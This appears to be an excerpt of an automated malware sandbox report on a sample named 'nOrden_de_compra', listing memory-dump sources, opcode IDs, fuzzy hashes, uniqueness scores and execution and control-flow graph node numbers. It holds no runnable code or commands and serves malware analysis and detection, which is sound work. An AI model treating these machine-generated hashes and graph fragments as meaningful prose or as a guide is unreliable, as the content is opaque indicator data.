                                          • Instruction Fuzzy Hash: AAE0E5B8914208EFCB40DF99D448A9CBBB4FF49300F1081A9EC4457321E771AE95EF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction ID: c48cd579cb1e3d987013fe667204ab947aa3ce111a7fc95bd00f2af89dc2c56b
                                          • Opcode Fuzzy Hash: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction Fuzzy Hash: C3E0EDB4D14208EFCB44DFA8D44569CBBF4EB48200F10C1A99C0893350D7719A42DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction ID: 05b0c0166e93796f28d3e78035b2c1cf30ecbab85724f97bd61002f9ff1e3938
                                          • Opcode Fuzzy Hash: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction Fuzzy Hash: D3E0E5B4E18208EFCB84DFA8D4456ACBBF4EB89200F10C5A9D80893350D771AE82DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ddb152ee0ea20c1ac090cfe9673ba691b683a84de43837ea1c0ab2b226f2a6b0
                                          • Instruction ID: 92d483ebe676e5a2ce93d648ddfc1fe804f2f8519c174a74701540b87dc0c977
                                          • Opcode Fuzzy Hash: ddb152ee0ea20c1ac090cfe9673ba691b683a84de43837ea1c0ab2b226f2a6b0
                                          • Instruction Fuzzy Hash: 49E0ECB5425208EBCB00DFA4941A69D7BF8EB4A201F2056A5DD0993111EFB59A44EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da2251bc9733cf8c393514dc4901c35760c825088edebf3b236f1f08a7f9e3c7
                                          • Instruction ID: 0f23c470e53e1b28cd1da8d1a26023ebe1e79c4b41a33d768e820be8b32f0e81
                                          • Opcode Fuzzy Hash: da2251bc9733cf8c393514dc4901c35760c825088edebf3b236f1f08a7f9e3c7
                                          • Instruction Fuzzy Hash: 6DE0C2B542920CEBC700EFA484046AE7BFCEB4A200F000DA5D90593110EF708E84EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc7397d9b7c58671a788fbd4fd4da2cbcad5a99490df804126fd4891420bebf8
                                          • Instruction ID: 814e09a81ac53cec9b9a8df55936b739a1401a3bc5e6ccd17e52fb3fa2df59f5
                                          • Opcode Fuzzy Hash: bc7397d9b7c58671a788fbd4fd4da2cbcad5a99490df804126fd4891420bebf8
                                          • Instruction Fuzzy Hash: 01E08C78918208EBC744DFD4D54966CBBB9AB86300F5082D88C0853380CB71AE52DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68a26177f97851a0093c7c77f4b52288895981aeec4b4920c3fd2d6453a140b0
                                          • Instruction ID: 655497b668450f110905b2a90248c1aafffcdeb5f4ce9fafd364d0b65b5c1682
                                          • Opcode Fuzzy Hash: 68a26177f97851a0093c7c77f4b52288895981aeec4b4920c3fd2d6453a140b0
                                          • Instruction Fuzzy Hash: 69E0ECB8935258EFC740DFA8D44969CBBF4BB09201F5001A9DD0893340FB709A85DB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 003801b341581ebf7b3e29c42f1b2e298f51a052d5dc9f6eb7761d14bace70d9
                                          • Instruction ID: 715b3ab78ccaa92c5676ad3b7481e0742c64e2e5e2f88f1847045b29a16c7e88
                                          • Opcode Fuzzy Hash: 003801b341581ebf7b3e29c42f1b2e298f51a052d5dc9f6eb7761d14bace70d9
                                          • Instruction Fuzzy Hash: 2CE07E7492122ACFEB14DF64DD45B9ABBB1BB49305F0046999809A2250CBB12E81CF00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 505d34e5d9f5edcd84e9f19661d2e61ac48c19e68088633debbee076abd5ec04
                                          • Instruction ID: c31a189478d7a39b13b026e913cec9cb07dff1fb98d4247b7a47c928a8b792b8
                                          • Opcode Fuzzy Hash: 505d34e5d9f5edcd84e9f19661d2e61ac48c19e68088633debbee076abd5ec04
                                          • Instruction Fuzzy Hash: 79B012F53BC700F2B04D3A744C8997AF860EFA2B00F919C15730400078C8E0A565E31F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: m
                                          • API String ID: 0-3775001192
                                          • Opcode ID: b4e1dbeda0ce74e4eeeb6ecdfa63ff9c91756a4d53a511281b9f9eb49ee2d4b9
                                          • Instruction ID: 69f2f49b60b8f9bd9df1c81d9ece71fe6362359de83e7c826011f4e6101859e4
                                          • Opcode Fuzzy Hash: b4e1dbeda0ce74e4eeeb6ecdfa63ff9c91756a4d53a511281b9f9eb49ee2d4b9
                                          • Instruction Fuzzy Hash: 72412FB1D15A588BEB5CCF6B8D4479AFAF7BFC9201F14C1BAC40CAA255EB7045868F01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: m
                                          • API String ID: 0-3775001192
                                          • Opcode ID: 407b87fdb9413af1517e8cc9214093e8e50385786550c859e2f667e4e94f343d
                                          • Instruction ID: 9d2e0280fcb0b039ab4555ebf6e33ab9d49f2f0cabf19cc56eed085789723f9f
                                          • Opcode Fuzzy Hash: 407b87fdb9413af1517e8cc9214093e8e50385786550c859e2f667e4e94f343d
                                          • Instruction Fuzzy Hash: B54147B1D05A588BE75CCF6B8D4078AFAF3BFC9201F14C1BAC84CA6254EB7049468F01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 259a608263f232af97f88bfbfe232fc77f4a205bc2b0d2ac682dd5071c34979a
                                          • Instruction ID: bb21be4567ddf0babd2581c504d6c897d2c54ee4a0aeaafe0d85605de5eaeec4
                                          • Opcode Fuzzy Hash: 259a608263f232af97f88bfbfe232fc77f4a205bc2b0d2ac682dd5071c34979a
                                          • Instruction Fuzzy Hash: 5CF1E4B5720226EFD719DB38C49462E7BE6BF85300B1644A9D806CB362CF75DC42EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26afede9ce2864f6d317ec464165acb86905180ecab1ae9ba7b341d117483539
                                          • Instruction ID: 659500b4beee8c3c4472d6ceac738d2dc07a8e869ce21937ddc5c51d492879da
                                          • Opcode Fuzzy Hash: 26afede9ce2864f6d317ec464165acb86905180ecab1ae9ba7b341d117483539
                                          • Instruction Fuzzy Hash: 01E11CB4E006598FDB14DF99C590AAEFBF6BF89305F248269E814A7355C730AD42CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39e934ae780194398b55df070cdc083aeeb11229fef39fa5ed50c7d7a75999c4
                                          • Instruction ID: ed0a0ab43e27e713dc1cd92f65c954a4be38cff3e0a9db2078c9023919b4272f
                                          • Opcode Fuzzy Hash: 39e934ae780194398b55df070cdc083aeeb11229fef39fa5ed50c7d7a75999c4
                                          • Instruction Fuzzy Hash: 89E1FBB4E00A198FDB14DFA9C590AAEFBB6FF49304F248269D414A7355D730AD42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9fcc9c0c3f9c6af90ee465c1e9688305f26f1c4c87b2899212aeff1e93f79d79
                                          • Instruction ID: 8cda29ffe9b7bb43fa029fddf8302c8fbd49fa7ba720b9248685f79483340a2c
                                          • Opcode Fuzzy Hash: 9fcc9c0c3f9c6af90ee465c1e9688305f26f1c4c87b2899212aeff1e93f79d79
                                          • Instruction Fuzzy Hash: 65E10CB4E006598FDB14DFA9C590AAEFBB6FF49304F248269D414AB355D730AD42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd93464c866f51ae1ba5b114ff8a16396751efaffdd4483700eff0a607e84ed0
                                          • Instruction ID: 95fc280a093c30adaec5ea02d1bafa01aa069bbf597ec898aa1aa24dc1996079
                                          • Opcode Fuzzy Hash: cd93464c866f51ae1ba5b114ff8a16396751efaffdd4483700eff0a607e84ed0
                                          • Instruction Fuzzy Hash: E7E11DB4E006598FDB14DFA9C590AAEFBB6FF89304F248159D414A7355D7309D42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ed95fde67a2ad215722d4defc667b21a038adc7785ee99f8aa9c23affae24b1
                                          • Instruction ID: 0d3a8f72301bc4bf06c5ccff620ecf7782aec1040e9444f349b727a1ec56434e
                                          • Opcode Fuzzy Hash: 7ed95fde67a2ad215722d4defc667b21a038adc7785ee99f8aa9c23affae24b1
                                          • Instruction Fuzzy Hash: 2FE11BB4E00619CFDB14DF98C590AAEFBB6BF49305F248169D414AB356D730AD42CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c422e4ccb670e9b2800b106f7973eb6256bbaa310cd0ce2a1083585a5239f02c
                                          • Instruction ID: b56c412c5d29aff41b569f8030b1013fab5717a3812edb47b94ece8ee2f85585
                                          • Opcode Fuzzy Hash: c422e4ccb670e9b2800b106f7973eb6256bbaa310cd0ce2a1083585a5239f02c
                                          • Instruction Fuzzy Hash: 24D1E5B4A04605CFDB18DF69C598EA9B7F5BF4D300F2580A8E506AB3A1DB31AD45CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd3127013eb343a4dfb67b47c3111817420e66e009b9edce0b0e0bb8569ced35
                                          • Instruction ID: dde1212940092d9758500d6058fcde45268bf71eb278b20f537c831e6fd91b4d
                                          • Opcode Fuzzy Hash: bd3127013eb343a4dfb67b47c3111817420e66e009b9edce0b0e0bb8569ced35
                                          • Instruction Fuzzy Hash: 31A17332E1020A8FCF05DFB4D9845DEBBB2FF85300B2585AAE905AB265DB71D945CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd65514dde86f62ed3e332708eb83a2c1495872b90e454e91d13623753958a12
                                          • Instruction ID: 09dc2f95999633cefd8802e1437bb1578df0ee2f40926200b4eefe214b18db87
                                          • Opcode Fuzzy Hash: dd65514dde86f62ed3e332708eb83a2c1495872b90e454e91d13623753958a12
                                          • Instruction Fuzzy Hash: 10611974E116098BD748EF7AE84569ABFF2BBC8304F14D129D908E7258EF746946CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8b7cce92848357c7302a0804bec77ccbb9f40ae447629bffbc9a1732b712a782
                                          • Instruction ID: 9f03846cc0e8120cee7d92156a65bc001b4b30b90d0e1b50cec8090cd158ce38
                                          • Opcode Fuzzy Hash: 8b7cce92848357c7302a0804bec77ccbb9f40ae447629bffbc9a1732b712a782
                                          • Instruction Fuzzy Hash: 9D610974A116098FD748EF7AE84469ABFF2BBC8304F14D529D808A7258EF746846CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b88267a5714c380670a18a90525443a7bda6557b6acd8d3afb25d1a4883d2fb
                                          • Instruction ID: 3ea3e977c7371494a268eac46606c53b3b5a509429c8d3a5e41f6b48fad49afe
                                          • Opcode Fuzzy Hash: 5b88267a5714c380670a18a90525443a7bda6557b6acd8d3afb25d1a4883d2fb
                                          • Instruction Fuzzy Hash: FC51E4B4E152299FCB04CFAAD5849AEFBF2FF88300F25D166D418A7215D730A942DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cbe83aa06a7d34ad233747ca8b9ae041226cb47cde2832b5c0db53c0f11f4cd5
                                          • Instruction ID: 762e7ad017a8c3612841cd6cda5581cf23bc314d544d1c1e3fc6411f2a844001
                                          • Opcode Fuzzy Hash: cbe83aa06a7d34ad233747ca8b9ae041226cb47cde2832b5c0db53c0f11f4cd5
                                          • Instruction Fuzzy Hash: 56515DB4E006598FDB14CFA9C5805AEFBF2FF89304F248169D418A7256D7309D42CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 91b1db1726fab08a765c7e3c26c0475bfb52a11de5c7ab98364177fbf3ecec04
                                          • Instruction ID: 54428d72cd2c7025e8e32c475bcff07a2097f3e1545a8d1d82953311cae27c62
                                          • Opcode Fuzzy Hash: 91b1db1726fab08a765c7e3c26c0475bfb52a11de5c7ab98364177fbf3ecec04
                                          • Instruction Fuzzy Hash: 06512BB4E006598FDB15CFA9C9805AEFBF6FF89304F24816AD418A7356D7309942CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7d959b89fed2f6416c05884e2557852416b287c3c006c168afd320396081425
                                          • Instruction ID: 3742ecc5d97835a554117428689740c2ae3fc056a61d14680afa9b0e8ee50c0f
                                          • Opcode Fuzzy Hash: d7d959b89fed2f6416c05884e2557852416b287c3c006c168afd320396081425
                                          • Instruction Fuzzy Hash: 435109B4E006198FDB14CFA9C5806AEFBF6BF89304F248169D418A7356D7319942CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:12%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:31
                                          Total number of Limit Nodes:4
                                          execution_graph 24241 2cd0848 24243 2cd084e 24241->24243 24242 2cd091b 24243->24242 24245 2cd1383 24243->24245 24246 2cd138a 24245->24246 24247 2cd1488 24246->24247 24251 2cd7d48 24246->24251 24255 2cd7da0 24246->24255 24259 2cd7eb8 24246->24259 24247->24243 24253 2cd7da0 24251->24253 24252 2cd7f22 24252->24246 24253->24252 24266 2cdf4c7 24253->24266 24257 2cd7db6 24255->24257 24256 2cd7f22 24256->24246 24257->24256 24258 2cdf4c7 2 API calls 24257->24258 24258->24256 24260 2cd7ec2 24259->24260 24261 2cd7edc 24260->24261 24263 6b8fab8 2 API calls 24260->24263 24264 6b8faa8 2 API calls 24260->24264 24262 2cd7f22 24261->24262 24265 2cdf4c7 2 API calls 24261->24265 24262->24246 24263->24261 24264->24261 24265->24262 24267 2cdf4d2 24266->24267 24271 6b8fab8 24267->24271 24275 6b8faa8 24267->24275 24268 2cdf4d9 24268->24252 24273 6b8facd 24271->24273 24272 6b8fce2 24272->24268 24273->24272 24274 6b8fcf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24273->24274 24274->24273 24277 6b8facd 24275->24277 24276 6b8fce2 24276->24268 24277->24276 24278 6b8fcf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24277->24278 24278->24277

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 71 6b855e0-6b855fd 72 6b855ff-6b85602 71->72 73 6b85628-6b8562b 72->73 74 6b85604-6b85623 72->74 75 6b8562d-6b85630 73->75 76 6b85635-6b85638 73->76 74->73 75->76 78 6b8563a-6b85649 76->78 79 6b8564e-6b85651 76->79 78->79 80 6b8565d-6b85660 79->80 81 6b85653-6b8565c 79->81 82 6b8567a-6b8567d 80->82 83 6b85662-6b8566c 80->83 86 6b8567f-6b85681 82->86 87 6b85684-6b85687 82->87 88 6b85673-6b85675 83->88 86->87 89 6b85689-6b8568f 87->89 90 6b856bf-6b856c2 87->90 88->82 91 6b857af-6b857db 89->91 92 6b85695-6b8569d 89->92 93 6b856d1-6b856d4 90->93 94 6b856c4-6b856ca 90->94 104 6b857e5-6b857e8 91->104 92->91 95 6b856a3-6b856b0 92->95 97 6b856e2-6b856e5 93->97 98 6b856d6-6b856dd 93->98 94->89 96 6b856cc 94->96 95->91 102 6b856b6-6b856ba 95->102 96->93 100 6b856f9-6b856fc 97->100 101 6b856e7-6b856f4 97->101 98->97 100->94 103 6b856fe-6b85701 100->103 101->100 102->90 106 6b8570b-6b8570e 103->106 107 6b85703-6b85706 103->107 108 6b857f9-6b857fc 104->108 109 6b857ea-6b857f4 104->109 110 6b85710-6b85711 106->110 111 6b85716-6b85719 106->111 107->106 112 6b8581e-6b85821 108->112 113 6b857fe-6b85802 108->113 109->108 110->111 114 6b8571b-6b8572d 111->114 115 6b85732-6b85735 111->115 119 6b85843-6b85846 112->119 120 6b85823-6b85827 112->120 117 6b85808-6b85810 113->117 118 6b858d6-6b85914 113->118 114->115 121 6b85752-6b85755 115->121 122 6b85737-6b8574d 115->122 117->118 127 6b85816-6b85819 117->127 142 6b85916-6b85919 118->142 123 6b85848-6b8584c 119->123 124 6b85864-6b85867 119->124 120->118 129 6b8582d-6b85835 120->129 125 6b8576e-6b85774 121->125 126 6b85757-6b8575a 121->126 122->121 123->118 131 6b85852-6b8585a 123->131 134 6b85869-6b8587a 124->134 135 6b8587f-6b85882 124->135 125->83 137 6b8577a 125->137 132 6b85769-6b8576c 126->132 133 6b8575c-6b85762 126->133 127->112 129->118 138 6b8583b-6b8583e 129->138 131->118 139 6b8585c-6b8585f 131->139 132->125 141 6b8577f-6b85782 132->141 133->107 140 6b85764 133->140 
134->135 143 6b85892-6b85895 135->143 144 6b85884-6b8588b 135->144 137->141 138->119 139->124 140->132 148 6b8578f-6b85791 141->148 149 6b85784-6b85788 141->149 146 6b8591f-6b85ab3 142->146 147 6b85c02-6b85c05 142->147 152 6b858af-6b858b2 143->152 153 6b85897-6b8589b 143->153 150 6b8588d 144->150 151 6b858ce-6b858d5 144->151 220 6b85ab9-6b85ac0 146->220 221 6b85bec-6b85bff 146->221 147->146 154 6b85c0b-6b85c0e 147->154 157 6b85798-6b8579b 148->157 158 6b85793 148->158 155 6b8578a 149->155 156 6b857a1-6b857ae 149->156 150->143 160 6b858bc-6b858be 152->160 161 6b858b4-6b858bb 152->161 153->118 159 6b8589d-6b858a5 153->159 164 6b85c18-6b85c1b 154->164 165 6b85c10-6b85c15 154->165 155->148 157->72 157->156 158->157 159->118 167 6b858a7-6b858aa 159->167 162 6b858c0 160->162 163 6b858c5-6b858c8 160->163 162->163 163->104 163->151 168 6b85c1d-6b85c30 164->168 169 6b85c33-6b85c36 164->169 165->164 167->152 169->146 170 6b85c3c-6b85c3f 169->170 173 6b85c59-6b85c5c 170->173 174 6b85c41-6b85c52 170->174 175 6b85c6a-6b85c6d 173->175 176 6b85c5e-6b85c65 173->176 174->176 181 6b85c54 174->181 178 6b85c6f-6b85c80 175->178 179 6b85c87-6b85c8a 175->179 176->175 178->168 191 6b85c82 178->191 183 6b85c8c-6b85c9d 179->183 184 6b85ca4-6b85ca7 179->184 181->173 183->176 196 6b85c9f 183->196 186 6b85ca9-6b85cba 184->186 187 6b85cc1-6b85cc4 184->187 186->183 197 6b85cbc 186->197 189 6b85cde-6b85ce1 187->189 190 6b85cc6-6b85cd7 187->190 194 6b85cef-6b85cf1 189->194 195 6b85ce3-6b85cea 189->195 190->176 202 6b85cd9 190->202 191->179 200 6b85cf8-6b85cfb 194->200 201 6b85cf3 194->201 195->194 196->184 197->187 200->142 203 6b85d01-6b85d0a 200->203 201->200 202->189 222 6b85b74-6b85b7b 220->222 223 6b85ac6-6b85af9 220->223 222->221 224 6b85b7d-6b85bb0 222->224 234 6b85afb 223->234 235 6b85afe-6b85b3f 223->235 236 6b85bb2 224->236 237 6b85bb5-6b85be2 224->237 234->235 245 6b85b41-6b85b52 235->245 246 6b85b57-6b85b5e 235->246 236->237 237->203 245->203 248 6b85b66-6b85b68 246->248 248->203
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $
                                          • API String ID: 0-3993045852
                                          • Opcode ID: 9e3cd6d560a8f2f5d87acd3d2620952a72786a900edd26bba00e41f768ff9c65
                                          • Instruction ID: 732c78d1affc1f91bc424924b90ae8193ade156e73dbe2fd391e16dbac411761
                                          • Opcode Fuzzy Hash: 9e3cd6d560a8f2f5d87acd3d2620952a72786a900edd26bba00e41f768ff9c65
                                          • Instruction Fuzzy Hash: 9022C676E002199FDFA4EBA5C4806AEBBB2FF85310F2485A9D405EB395DB35DC41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 028061247b5679d60b310d967d51b754c967a6d3f728c51b88359629478c6dcd
                                          • Instruction ID: a145a8000b47db83b0169daaccee044124881047878d38b06bcbabdf7dbf7d94
                                          • Opcode Fuzzy Hash: 028061247b5679d60b310d967d51b754c967a6d3f728c51b88359629478c6dcd
                                          • Instruction Fuzzy Hash: 64922674A00204CFDB64EB68C584B6DBBF2EF45314F5494AAD409AB3A5DB35ED82CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4a06e12862a601ab44e0c8a9734cb8de1f4d40b8283c9adb4370f27ad9002f26
